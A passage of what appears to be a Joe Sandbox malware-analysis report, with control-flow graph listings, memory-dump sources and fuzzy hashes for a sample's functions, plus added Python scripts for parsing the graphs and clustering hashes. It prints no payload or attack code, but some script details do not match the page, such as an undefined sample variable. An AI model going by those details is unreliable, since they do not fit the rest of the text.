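    edges: list[tuple[int, int]] = []
    current: Block | None = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        # A node id is a decimal token immediately followed by an address;
        # decimal annotations such as the '2' in '2 API calls' fail this test.
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            start, _, end = tokens[i + 1].partition("-")
            current = Block(int(tok), int(start, 16), int(end, 16) if end else None)
            blocks[current.node_id] = current
            i += 2
            continue
        if current is None:
            raise ValueError(f"annotation {tok!r} before any block")
        if tok == "call" and i + 1 < len(tokens):
            current.calls.append(int(tokens[i + 1], 16))
            i += 2
            continue
        if API_RE.match(tok) and tok != "API":
            current.apis.append(tok)
        else:
            current.notes.append(tok)
        i += 1
    return Graph(kind, blocks, edges)


def call_targets(graph: Graph) -> list[int]:
    """Distinct resolved call targets, ascending."""
    return sorted({t for b in graph.blocks.values() for t in b.calls})


def api_names(graph: Graph) -> list[str]:
    """Distinct API names annotated on the graph's blocks."""
    return sorted({a for b in graph.blocks.values() for a in b.apis})


def root_blocks(graph: Graph) -> list[int]:
    """Node ids with no incoming edge: the candidate function entry blocks."""
    targets = {dst for _, dst in graph.edges}
    return [nid for nid in graph.blocks if nid not in targets]


if __name__ == "__main__":
    g = parse_graph(SAMPLE_CFG)
    print(g.kind, len(g.blocks), "blocks,", len(g.edges), "edges")
    print("calls:", [hex(t) for t in call_targets(g)])
    print("apis: ", api_names(parse_graph(SAMPLE_EXEC)))
```

Node ids are only recognised when the next token is an address, which is what keeps the `2` in `2 API calls` from being read as a block; anything the parser does not understand is kept in `notes` rather than dropped, so a dump that uses an annotation not seen on this page is still visible in the output.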

                                                                                                        Control-flow Graph

                                                                                                        Graph data for the function rooted at 29e6fc8 (first block 29e6fc8-29e6ffe), rendered as an Executed / Not Executed block graph in the interactive report. Resolved calls: the call at 29e7000 is resolved to 29e7118, 29e6fc8 (the function itself) or 29e69a0; the call at 29e708d to 29ea088, 29ea0e8 or 29e9dd0; block 29e73ee-29e740d calls 29e76f1.
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                        • API String ID: 0-2525668591
                                                                                                        • Opcode ID: b279d36399467caaa9de9f63b583dd9518e40d917c6ccc204bf19a5713d486e4
                                                                                                        • Instruction ID: 27d75b5b8370146a21ad07ce9d2909f68de1ed2fccc33e1e9c07754a048873a8
                                                                                                        • Opcode Fuzzy Hash: b279d36399467caaa9de9f63b583dd9518e40d917c6ccc204bf19a5713d486e4
                                                                                                        • Instruction Fuzzy Hash: 96123E30A00219DFCF16CFA9D884AEEFBB6BF89304F158465E8569B365DB30D941CB52

                                                                                                        Control-flow Graph

                                                                                                        Graph data for the function rooted at 29ec146 (first block 29ec146-29ec158), rendered as an Executed / Not Executed block graph in the interactive report. Resolved calls: block 29ec1cf-29ec2ac calls 29e41a0 and 29e3cc0; block 29ec2b3-29ec2d4 calls 29e5658.
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: be9639aeae2fef8c6bb83cd375e1e84c1eabb152b8818a67be8021e210affa06
                                                                                                        • Instruction ID: 399272f56c13b968f0c818f8934709823c4b0a5bc98af54972d4d20b40788389
                                                                                                        • Opcode Fuzzy Hash: be9639aeae2fef8c6bb83cd375e1e84c1eabb152b8818a67be8021e210affa06
                                                                                                        • Instruction Fuzzy Hash: A8B11775E00258DFDF15CFA9D884A9DBBF2BF89304F1580AAE449AB365DB309881CF50

                                                                                                        Control-flow Graph

                                                                                                        Graph data for the function rooted at 29ed278 (first block 29ed278-29ed2a8), rendered as an Executed / Not Executed block graph in the interactive report. Resolved calls: block 29ed2af-29ed38c calls 29e41a0 and 29e3cc0; block 29ed393-29ed3b4 calls 29e5658.
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 4ef038c0199d3686b03745455277e1184cf920e97f58e5a2ab64c2ab81a7cfbd
                                                                                                        • Instruction ID: 65abedf044ebad5644e1269e1510b2c5f70cd4462050f01def3b314a91e74222
                                                                                                        • Opcode Fuzzy Hash: 4ef038c0199d3686b03745455277e1184cf920e97f58e5a2ab64c2ab81a7cfbd
                                                                                                        • Instruction Fuzzy Hash: 1E81A474E00218CFDB19DFAAD984A9DBBF6BF88304F14D069E419AB365DB349985CF10

                                                                                                        Control-flow Graph

                                                                                                        Graph data for the function rooted at 29eca08 (first block 29eca08-29eca38), rendered as an Executed / Not Executed block graph in the interactive report. Resolved calls: block 29eca3f-29ecb1c calls 29e41a0 and 29e3cc0; block 29ecb23-29ecb44 calls 29e5658.
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 56e70399927ca35f26adb1a4017848b24576acfc43d646fe14ea6ec111b2e7d3
                                                                                                        • Instruction ID: 35b607d0ef4da25f64e7080d4553cdc2613e6ab1136ab2915e260c13da39733b
                                                                                                        • Opcode Fuzzy Hash: 56e70399927ca35f26adb1a4017848b24576acfc43d646fe14ea6ec111b2e7d3
                                                                                                        • Instruction Fuzzy Hash: F581C874E00218CFDB19DFA9D944A9DBBF2BF88304F14C46AE459AB365DB309981CF50

                                                                                                        Control-flow Graph

                                                                                                        Graph data for the function rooted at 29eccd8 (first block 29eccd8-29ecd08), rendered as an Executed / Not Executed block graph in the interactive report. Resolved calls: block 29ecd0f-29ecdec calls 29e41a0 and 29e3cc0; block 29ecdf3-29ece14 calls 29e5658.
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 59d1977b7d2e8b331c838edd8abf6a5d2dcbc2066a01eb4d07dd74781f6f4801
                                                                                                        • Instruction ID: bdec3d76ae8e5d2db35bc23578a85ae5a61c83090ca302516107c92d25bb6bea
                                                                                                        • Opcode Fuzzy Hash: 59d1977b7d2e8b331c838edd8abf6a5d2dcbc2066a01eb4d07dd74781f6f4801
                                                                                                        • Instruction Fuzzy Hash: 5081D674E00218DFDB19DFA9D984A9DBBF2BF88304F14C06AE459AB365DB309981CF50

                                                                                                        Control-flow Graph

                                                                                                        Graph data for the function rooted at 29e5370 (first block 29e5370-29e53a0), rendered as an Executed / Not Executed block graph in the interactive report. Resolved calls: block 29e53a7-29e5484 calls 29e41a0 and 29e3cc0; the call at 29e54ac is resolved to 29e5658 or 29e5649.
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 94e2b397551e6277f4e9dc683c95085cc8758c879c42ef643249aaeac25e2d4d
                                                                                                        • Instruction ID: d55fcc65edc6895fb692f452c4f4a73e80472770144c5b18a07399f76c19858e
                                                                                                        • Opcode Fuzzy Hash: 94e2b397551e6277f4e9dc683c95085cc8758c879c42ef643249aaeac25e2d4d
                                                                                                        • Instruction Fuzzy Hash: 1281B674E00218CFDB19DFAAD984A9DBBF2BF88304F15C469E419AB365DB309981CF10

                                                                                                        Control-flow Graph

                                                                                                        Graph data for the function rooted at 29ec738 (first block 29ec738-29ec768), rendered as an Executed / Not Executed block graph in the interactive report. Resolved calls: block 29ec76f-29ec84c calls 29e41a0 and 29e3cc0; block 29ec853-29ec874 calls 29e5658.
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 31cf9525b74a6687babad14e107e75120face61ee44f5cdca907c7d79bd5a76e
                                                                                                        • Instruction ID: a9ee97a0cabb612ccf6938c566121265ec21efd1ed34221f923a2ecec4f37b44
                                                                                                        • Opcode Fuzzy Hash: 31cf9525b74a6687babad14e107e75120face61ee44f5cdca907c7d79bd5a76e
                                                                                                        • Instruction Fuzzy Hash: C0818474E00218DFDB19DFA9D984A9DBBF2BF88304F14C06AE459AB365DB349981CF50

                                                                                                        Control-flow Graph

                                                                                                        Graph data for the function rooted at 29ecfab (first block 29ecfab-29ecfd8), rendered as an Executed / Not Executed block graph in the interactive report. Resolved calls: block 29ecfdf-29ed0bc calls 29e41a0 and 29e3cc0; block 29ed0c3-29ed0e4 calls 29e5658.
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: c8d481b00649db2de64e62295f688609f929075bb88a03f898ab0a6d896ce0d0
                                                                                                        • Instruction ID: 65e40502fb449388819f3a93a7e7b9fa952dde4d753df60c04ffb4292f49d2d5
                                                                                                        • Opcode Fuzzy Hash: c8d481b00649db2de64e62295f688609f929075bb88a03f898ab0a6d896ce0d0
                                                                                                        • Instruction Fuzzy Hash: 1B81A174E00218DFDB19DFAAD994A9DBBF6BF89304F14C069E419AB365DB309981CF10
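The Similarity blocks above give one Instruction Fuzzy Hash per function, and seven of the functions in this memory dump (the ones sharing API String ID 0-1487592376 and the string set 0oAp$LjAp$LjAp$PH^q$PH^q) carry almost the same hash, consistent with a set of near-identical stubs in the unpacked 029E0000 region. The script below is an added example for this page, not Joe Sandbox code: it copies the nine hashes from the blocks above and groups them by positional hex-digit distance. Joe Sandbox does not publish the metric behind the hash, so treating it as a fixed-position string, using Hamming distance, and cutting at a distance of 16 are assumptions made here for quick triage, not the report's own similarity calculation.

```python
# Added example for this report page, not Joe Sandbox code. Joe Sandbox does
# not publish the metric behind its Instruction Fuzzy Hash; treating the hash
# as a fixed-position string and counting differing hex digits (Hamming
# distance) is an assumption made here for triage, and the threshold used in
# __main__ is a guess to be tuned against functions known to be identical.
from __future__ import annotations

# Instruction Fuzzy Hash values copied from the function blocks on this page,
# keyed by the address each block's control-flow graph is rooted at.
FUZZY_HASHES = {
    "29ec468": "23A1D574E00219CFDF19DFA9D944AADBBF2BF88304F10906AE45AAB365DB309941CF50",
    "29e6fc8": "96123E30A00219DFCF16CFA9D884AEEFBB6BF89304F158465E8569B365DB30D941CB52",
    "29ec146": "A8B11775E00258DFDF15CFA9D884A9DBBF2BF89304F1580AAE449AB365DB309881CF50",
    "29ed278": "1E81A474E00218CFDB19DFAAD984A9DBBF6BF88304F14D069E419AB365DB349985CF10",
    "29eca08": "F581C874E00218CFDB19DFA9D944A9DBBF2BF88304F14C46AE459AB365DB309981CF50",
    "29eccd8": "5081D674E00218DFDB19DFA9D984A9DBBF2BF88304F14C06AE459AB365DB309981CF50",
    "29e5370": "1281B674E00218CFDB19DFAAD984A9DBBF2BF88304F15C469E419AB365DB309981CF10",
    "29ec738": "C0818474E00218DFDB19DFA9D984A9DBBF2BF88304F14C06AE459AB365DB349981CF50",
    "29ecfab": "1B81A174E00218DFDB19DFAAD994A9DBBF6BF89304F14C069E419AB365DB309981CF10",
}


def hamming(a: str, b: str) -> int:
    """Number of hex-digit positions at which two equal-length hashes differ."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes must be the same length to compare positionally")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def similarity(a: str, b: str) -> float:
    """1.0 for identical hashes, 0.0 when every position differs."""
    return 1.0 - hamming(a, b) / len(a)


def cluster(hashes: dict[str, str], max_distance: int) -> list[list[str]]:
    """Single-linkage grouping (union-find): two functions land in one cluster
    when a chain of pairwise distances <= max_distance connects them."""
    names = list(hashes)
    parent = {n: n for n in names}

    def find(n: str) -> str:
        while parent[n] != n:
            parent[n] = parent[parent[n]]  # path halving
            n = parent[n]
        return n

    for i, a in enumerate(names):
        for b in names[i + 1:]:
            if hamming(hashes[a], hashes[b]) <= max_distance:
                parent[find(a)] = find(b)
    groups: dict[str, list[str]] = {}
    for n in names:
        groups.setdefault(find(n), []).append(n)
    return sorted(groups.values(), key=lambda g: (-len(g), g[0]))


if __name__ == "__main__":
    for group in cluster(FUZZY_HASHES, 16):
        print(f"{len(group)} function(s): {', '.join(group)}")
```

With the threshold at 16, the function rooted at 29e6fc8 (the one with a different string set, (o^q$(o^q$(o^q$,bq$,bq) is the only singleton, while 29eca08, 29eccd8 and 29ec738 differ from each other in fewer than ten of the seventy digits. Single linkage was chosen deliberately: a chain of small edits between consecutive stub copies should not split a family in two, but it also means one loose threshold can bridge unrelated functions, so check the pairwise distances before trusting a large cluster.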

Control-flow Graph
Function entry: block 1444 at 0x6969328. API call sites: LdrInitializeThunk in block 1501 (0x696957e-0x6969614) and in block 1552 (0x6969a69-0x6969a7f). Subroutine call: block 1566 (0x6969970-0x69699d1) calls 0x6969328, the function's own entry address. Node and edge listing (block id, address range, optional call target or API name, edges a->b):
control_flow_graph 1444 6969328-6969338 1445 696933f-696934b 1444->1445 1446 696933a 1444->1446 1449 6969352-6969367 1445->1449 1450 696934d 1445->1450 1447 696946b-6969475 1446->1447 1453 696936d-6969378 1449->1453 1454 696947b-69694bb 1449->1454 1450->1447 1457 6969476 1453->1457 1458 696937e-6969385 1453->1458 1472 69694c2-6969577 1454->1472 1457->1454 1459 6969387-696939e 1458->1459 1460 69693b2-69693bd 1458->1460 1471 69693a4-69693a7 1459->1471 1459->1472 1465 69693bf-69693c7 1460->1465 1466 69693ca-69693d4 1460->1466 1465->1466 1473 696945e-6969463 1466->1473 1474 69693da-69693e4 1466->1474 1471->1457 1475 69693ad-69693b0 1471->1475 1501 696957e-6969614 LdrInitializeThunk 1472->1501 1502 6969579 1472->1502 1473->1447 1474->1457 1481 69693ea-6969406 1474->1481 1475->1459 1475->1460 1486 696940a-696940d 1481->1486 1487 6969408 1481->1487 1488 6969414-6969417 1486->1488 1489 696940f-6969412 1486->1489 1487->1447 1491 696941a-6969428 1488->1491 1489->1491 1491->1457 1495 696942a-6969431 1491->1495 1495->1447 1496 6969433-6969439 1495->1496 1496->1457 1498 696943b-6969440 1496->1498 1498->1457 1499 6969442-6969455 1498->1499 1499->1457 1505 6969457-696945a 1499->1505 1504 69696b3-69696b9 1501->1504 1502->1501 1506 69696bf-69696d7 1504->1506 1507 6969619-696962c 1504->1507 1505->1496 1508 696945c 1505->1508 1509 69696eb-69696fe 1506->1509 1510 69696d9-69696e6 1506->1510 1511 6969633-6969684 1507->1511 1512 696962e 1507->1512 1508->1447 1514 6969705-6969721 1509->1514 1515 6969700 1509->1515 1513 6969a81-6969b7e 1510->1513 1528 6969686-6969694 1511->1528 1529 6969697-69696a9 1511->1529 1512->1511 1520 6969b86-6969b90 1513->1520 1521 6969b80-6969b85 1513->1521 1518 6969723 1514->1518 1519 6969728-696974c 1514->1519 1515->1514 1518->1519 1524 6969753-6969785 1519->1524 1525 696974e 1519->1525 1521->1520 1534 6969787 1524->1534 1535 696978c-69697ce 1524->1535 1525->1524 1528->1506 1531 69696b0 1529->1531 1532 69696ab 1529->1532 1531->1504 1532->1531 1534->1535 1537 69697d5-69697de 1535->1537 1538 69697d0 1535->1538 1539 6969a06-6969a0c 1537->1539 1538->1537 1540 6969a12-6969a25 1539->1540 1541 69697e3-6969808 1539->1541 1544 6969a27 1540->1544 1545 6969a2c-6969a47 1540->1545 1542 696980f-6969846 1541->1542 1543 696980a 1541->1543 1553 696984d-696987f 1542->1553 1554 6969848 1542->1554 1543->1542 1544->1545 1546 6969a4e-6969a62 1545->1546 1547 6969a49 1545->1547 1551 6969a64 1546->1551 1552 6969a69-6969a7f LdrInitializeThunk 1546->1552 1547->1546 1551->1552 1552->1513 1556 69698e3-69698f6 1553->1556 1557 6969881-69698a6 1553->1557 1554->1553 1558 69698fd-6969922 1556->1558 1559 69698f8 1556->1559 1560 69698ad-69698db 1557->1560 1561 69698a8 1557->1561 1564 6969924-6969925 1558->1564 1565 6969931-6969969 1558->1565 1559->1558 1560->1556 1561->1560 1564->1540 1566 6969970-69699d1 call 6969328 1565->1566 1567 696996b 1565->1567 1573 69699d3 1566->1573 1574 69699d8-69699fc 1566->1574 1567->1566 1573->1574 1577 6969a03 1574->1577 1578 69699fe 1574->1578 1577->1539 1578->1577
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4146949146.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6960000_HJnkiZjAPsec.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 68db9991c7778ece39c221dbcbd1556deb3fb4554ceae8c3db50e6eb1b52460b
• Instruction ID: 2f5d7c967e0bd378baad9229621215548ea5d74ac758049d1e2334a74c2da9dd
• Opcode Fuzzy Hash: 68db9991c7778ece39c221dbcbd1556deb3fb4554ceae8c3db50e6eb1b52460b
• Instruction Fuzzy Hash: C0223770E00219CFDB54DFA9C984B9DBBB2BF88304F1085A9E419AB395DB349D85CF90
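The control_flow_graph listings in this report are the Joe Sandbox IDA plugin's flattened node/edge dump: a decimal block id followed by its hex address range, optionally a `call <addr>` (with `* N` when the same target is called N times) or an API name attached to that block, and `a->b` edges. When triaging a dump like the RWX region at 06960000 above, the useful questions are where the API calls sit, which blocks call back into the function (recursion), and which blocks are dead. The parser below is an added example, not code from Joe Sandbox or from this report; the token grammar is inferred from the listings on this page and is an assumption, not a documented format. The embedded sample is a trimmed excerpt of the 0x6969328 graph, with two edges (1445->1472 and 1501->1565) constructed so the fragment stays connected.

```python
"""Parse a Joe Sandbox 'control_flow_graph' listing into blocks and edges.

Added example. The token grammar (block id, hex range, optional 'call X [* N]'
or API name, edges 'a->b') is inferred from the report text and is an assumption.
"""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

ADDR_RANGE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")  # e.g. 6969328-6969338
NODE_ID = re.compile(r"^\d+$")                              # e.g. 1444
EDGE = re.compile(r"^(\d+)->(\d+)$")                        # e.g. 1444->1445


@dataclass
class Block:
    bid: int
    start: int
    end: int
    apis: List[str] = field(default_factory=list)                # API names attached to the block
    calls: List[Tuple[int, int]] = field(default_factory=list)   # (target address, repeat count)


@dataclass
class CFG:
    blocks: Dict[int, Block] = field(default_factory=dict)       # insertion order = listing order
    edges: List[Tuple[int, int]] = field(default_factory=list)
    entry: Optional[int] = None                                  # start address of the first block


def parse_cfg(text: str) -> CFG:
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    cfg, cur, i = CFG(), None, 0
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:                                                    # edge a->b
            cfg.edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if t == "call" and cur is not None and i + 1 < len(toks):
            target, count, i = int(toks[i + 1], 16), 1, i + 2
            if i + 1 < len(toks) and toks[i] == "*" and NODE_ID.match(toks[i + 1]):
                count, i = int(toks[i + 1]), i + 2               # "call X * 2": called twice
            cur.calls.append((target, count))
            continue
        if NODE_ID.match(t) and i + 1 < len(toks) and ADDR_RANGE.match(toks[i + 1]):
            m = ADDR_RANGE.match(toks[i + 1])                    # new block: id + address range
            start = int(m.group(1), 16)
            end = int(m.group(2), 16) if m.group(2) else start
            cur = Block(int(t), start, end)
            cfg.blocks[cur.bid] = cur
            if cfg.entry is None:
                cfg.entry = start
            i += 2
            continue
        if cur is not None:                                      # bare identifier: API name
            cur.apis.append(t)
        i += 1
    return cfg


def summarize(cfg: CFG) -> dict:
    succ = {bid: set() for bid in cfg.blocks}
    for a, b in cfg.edges:
        succ.setdefault(a, set()).add(b)
    seen, queue = set(), deque(list(cfg.blocks)[:1])            # BFS from the first listed block
    while queue:
        n = queue.popleft()
        if n in seen:
            continue
        seen.add(n)
        queue.extend(succ.get(n, ()))
    api_sites = [(b.bid, b.start, name) for b in cfg.blocks.values() for name in b.apis]
    call_sites = [(b.bid, b.start, tgt, n) for b in cfg.blocks.values() for tgt, n in b.calls]
    return {
        "entry": cfg.entry,
        "blocks": len(cfg.blocks),
        "edges": len(cfg.edges),
        "api_sites": api_sites,
        "call_sites": call_sites,
        "recursive": any(tgt == cfg.entry for _, _, tgt, _ in call_sites),
        "exit_blocks": sorted(b for b in cfg.blocks if not succ[b]),   # no successors
        "unreachable": sorted(set(cfg.blocks) - seen),                  # dead from entry
    }


# Constructed sample: trimmed excerpt of the 0x6969328 listing; edges 1445->1472
# and 1501->1565 were added to keep the fragment connected.
SAMPLE_CFG = (
    "control_flow_graph 1444 6969328-6969338 1445 696933f-696934b 1444->1445 "
    "1446 696933a 1444->1446 1472 69694c2-6969577 1445->1472 "
    "1501 696957e-6969614 LdrInitializeThunk 1472->1501 1502 6969579 1472->1502 "
    "1502->1501 1565 6969931-6969969 1501->1565 "
    "1566 6969970-69699d1 call 6969328 1565->1566 1567 696996b 1565->1567 1567->1566"
)

if __name__ == "__main__":
    s = summarize(parse_cfg(SAMPLE_CFG))
    print(f"entry 0x{s['entry']:x}: {s['blocks']} blocks, {s['edges']} edges")
    for bid, addr, name in s["api_sites"]:
        print(f"  block {bid} @0x{addr:x} calls API {name}")
    for bid, addr, tgt, n in s["call_sites"]:
        print(f"  block {bid} @0x{addr:x} calls 0x{tgt:x} x{n}")
    print(f"  recursive={s['recursive']} exits={s['exit_blocks']} unreachable={s['unreachable']}")
```

Feed it a whole listing line from the report to get the API call sites and recursion flag for that function; blocks reported as unreachable are candidates for junk code or for branches the sandbox never exercised.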
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
Similarity
• API ID:
• String ID: (o^q$4'^q
• API String ID: 0-273632683
• Opcode ID: 04b1e086e6112ffb2290ffd2f498237219e28695ee2e21973fbdb461e9b3b64d
• Instruction ID: 4243922e1bd9acfe3f197a9cf56c54496bb6c161feff4d63b3e5ef5bec763d85
• Opcode Fuzzy Hash: 04b1e086e6112ffb2290ffd2f498237219e28695ee2e21973fbdb461e9b3b64d
• Instruction Fuzzy Hash: 35826C71A00209DFCF16CFA8C584AAEBBF6BF88314F158959E4069B365D731ED91CB60
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
Similarity
• API ID:
• String ID: (o^q$Hbq
• API String ID: 0-662517225
• Opcode ID: a3431082d196eb25681f30f1ac16937758b2f65012e4c30f02fa686f3ed4901c
• Instruction ID: 60e79cfe032a91e4f1f55d45feffce9bb901134b943882d43cba63297ee0f8f8
• Opcode Fuzzy Hash: a3431082d196eb25681f30f1ac16937758b2f65012e4c30f02fa686f3ed4901c
• Instruction Fuzzy Hash: 73127F70A002198FDB19DF69C894BAEBBFABF88304F148559E4069B395DF30DD46CB90

Control-flow Graph
Function entry: block 2717 at 0x29e3e09. No API names are attached to any block. Subroutine calls: block 2730 calls 0x29e02c8, block 2742 calls 0x29e02d8, block 2744 calls 0x29e28f0, and block 2800 (0x29e41c1-0x29e42c9) calls 0x29e2278, 0x29e2288, 0x29e2298, 0x29e22a8 and 0x29e02e4 in sequence. Node and edge listing:
control_flow_graph 2717 29e3e09-29e3e25 2718 29e3e2e-29e3e3e 2717->2718 2719 29e3e27-29e3e29 2717->2719 2721 29e3e45-29e3e55 2718->2721 2722 29e3e40 2718->2722 2720 29e40cc-29e40d3 2719->2720 2724 29e3e5b-29e3e69 2721->2724 2725 29e40b3-29e40c1 2721->2725 2722->2720 2728 29e3e6f 2724->2728 2729 29e40d4-29e41ba 2724->2729 2725->2729 2730 29e40c3-29e40c7 call 29e02c8 2725->2730 2728->2729 2731 29e3f9f-29e3fc7 2728->2731 2732 29e3eda-29e3efb 2728->2732 2733 29e4039-29e4065 2728->2733 2734 29e3e76-29e3e88 2728->2734 2735 29e3f72-29e3f9a 2728->2735 2736 29e3eb3-29e3ed5 2728->2736 2737 29e400e-29e4034 2728->2737 2738 29e3f4c-29e3f6d 2728->2738 2739 29e3fcc-29e4009 2728->2739 2740 29e3e8d-29e3eae 2728->2740 2741 29e3f26-29e3f47 2728->2741 2742 29e4067-29e4082 call 29e02d8 2728->2742 2743 29e40a7-29e40b1 2728->2743 2744 29e4084-29e40a5 call 29e28f0 2728->2744 2745 29e3f00-29e3f21 2728->2745 2799 29e41bc 2729->2799 2800 29e41c1-29e42c9 call 29e2278 call 29e2288 call 29e2298 call 29e22a8 call 29e02e4 2729->2800 2730->2720 2731->2720 2732->2720 2733->2720 2734->2720 2735->2720 2736->2720 2737->2720 2738->2720 2739->2720 2740->2720 2741->2720 2742->2720 2743->2720 2744->2720 2745->2720 2799->2800 2818 29e42cf-29e435f 2800->2818
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
Similarity
• API ID:
• String ID: Xbq$$^q
• API String ID: 0-1593437937
• Opcode ID: 79f98410723d42e3381860d9df80e8c42ba959af038eb0b2daf8f4dc853f32a6
• Instruction ID: 7cbb82626248a834ab7417794c9a3df93baf69c4179b25f1a3c350ae86b826e8
• Opcode Fuzzy Hash: 79f98410723d42e3381860d9df80e8c42ba959af038eb0b2daf8f4dc853f32a6
• Instruction Fuzzy Hash: D2F17F74E04209CFDB59DFB8D8545AEBBB6FFC9300B148969E446AB358CF359802CB51
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4146949146.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6960000_HJnkiZjAPsec.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 082f45a3c924969e1193365f62736ea8e79b5b21a4b4f1f826204640a08e0896
• Instruction ID: 5d3bcb6a3b252749d33a731e3e7aa7119e776ef3e1ce7e8ad15b0d54104c71a9
• Opcode Fuzzy Hash: 082f45a3c924969e1193365f62736ea8e79b5b21a4b4f1f826204640a08e0896
• Instruction Fuzzy Hash: C831F3B1D016199BEB18CFABD9847DDFBF6AF88314F14C52AE418A62A4DB700945CF50
Memory Dump Source
• Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
Joe Sandbox IDA Plugin
